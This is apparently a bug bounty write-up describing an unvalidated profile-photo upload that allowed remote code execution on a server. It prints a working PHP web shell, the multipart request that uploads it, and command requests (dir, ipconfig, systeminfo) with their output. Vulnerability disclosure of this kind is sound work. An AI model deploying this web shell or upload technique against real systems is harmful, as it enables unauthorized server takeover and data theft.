BPP [$750]Arbitrary File Upload Vulnerability To Remote Code Execution (RCE) Outside the Platform.

Hello everyone, introducing my name Tengku Arya Saputra (Follow my LinkedIn). On this occasion I will tell you how I found a security hole with a very critical vulnerability level. I got this bug outside of any bug bounty platform, so this is an external program.

Initially, I found this vulnerability while testing an application that has a feature to update user profile photos. I started by observing the requests and responses from this feature using an intercept tool like Burp Suite. The endpoint used was /mobile/update-photo, which accepts image files from users to upload.

In the request, I noticed that the application did not validate the extension of the uploaded file. This caught my attention because generally a feature like this only allows files of a certain format, such as .jpg or .png. To prove this hypothesis, I tried renaming the uploaded file to a file with a .php extension and added the following code to the file content:

<?php
if(isset($_REQUEST['cmd'])){
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
}
?>

Then, I uploaded the file through the following request:

POST /mobile/update-photo HTTP/2
Host: xxx.xxx.com
Cookie: [Cookie terkait sesi pengguna]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEfvVAWnBQLlnzk1m

------WebKitFormBoundaryEfvVAWnBQLlnzk1m
Content-Disposition: form-data; name="file_photo"; filename="malicious.php"
Content-Type: application/x-php

<?php
if(isset($_REQUEST['cmd'])){
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
}
?>
------WebKitFormBoundaryEfvVAWnBQLlnzk1m--

After sending the request, the server responded with a “Success” message. This means that my file was successfully uploaded without any further validation. Next, I tried to find out the location of the uploaded file, and based on the HTTP activity I observed, my file was available at the following URL:

https://xxxx.xxx.com/assets/images/profile/xxxxxxxxxx/xxxxxxxxxx2881531.php

When I access the file and add the ?cmd= parameter, I can execute commands on the server directly. For example, I send the following request:

GET /assets/images/profile/xxxxxxxxxx/xxxx00122881531.php?cmd=dir HTTP/2
Host: xxxx.xxx.com

And the server responds with directory output:

Volume in drive C has no label.
Directory of C:\xxxxxxxxx\xxxxxx
11/17/2024  12:00 PM    <DIR>          .
11/17/2024  12:00 PM    <DIR>          ..
11/17/2024  12:00 PM             1,024 malicious.php

After that, I tried running additional commands such as ipconfig /all and systeminfo to get more information about the server. Here is some of the information I managed to obtain:

Command:

GET /assets/images/profile/xxxxxxxxx/xxxxxx0122881531.php?cmd=ipconfig%20/all HTTP/2
Host: xxxx.xxx.com

https://xxx.xxxxx.com/assets/images/profile/xxxxxxxxxxxxxxx/xxxxxx1228
81531.php?cmd=systeminfo

Vulnerability Impact: This vulnerability allows me to execute commands directly on the server, known as Remote Code Execution (RCE). With this access, I can:

1. Access and read sensitive files on the server.
2. Expose operating system and network configurations.
3. Use the server as a pivot to attack other systems on the network.

Conclusion: This was my experience finding critical gaps in external applications. Hopefully this post can be an important lesson for developers and the cybersecurity community to pay more attention to validation in the file upload feature. Don’t forget to follow me on LinkedIn for more interesting content! 😁

Timeline

Report — December 2, 2024

Change To Triaged — December 9, 2024

Respond Team — December 15, 2024

Reward Bounty via Mobile Banking $750 – 22 December, 2024

Resolved — 22 December, 2024